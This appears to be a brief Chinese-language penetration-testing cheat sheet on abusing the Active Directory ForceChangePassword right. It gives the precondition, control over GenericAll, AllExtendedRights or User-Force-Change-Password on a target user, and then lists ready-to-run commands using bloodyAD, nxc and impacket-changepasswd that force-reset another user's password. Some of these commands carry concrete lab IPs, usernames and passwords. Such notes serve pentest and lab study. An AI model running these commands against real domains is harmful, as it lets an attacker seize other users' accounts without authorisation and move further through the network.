2.ForceChangePassword
1. 利用
1.1. 利用条件
当控制目标具有 GenericAll 、 AllExtendedRights 或 User-Force-Change-Password 目标用户的对象时,可能会发生这种滥用行为。
如:
1.2. 利用工具
1.2.1. bloodyAD
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"
nxc smb 10.129.33.218 -u Caroline.Robinson -p 'BabyStart123!' -M change-password -o NEWPASS=Admin123
impacket-changepasswd hackme.thl/'dba_adm'@192.168.56.8 -newpass 'admin!@#45' -altuser 'jdoe' -altpass '$pr1ng@' -no-pass -reset
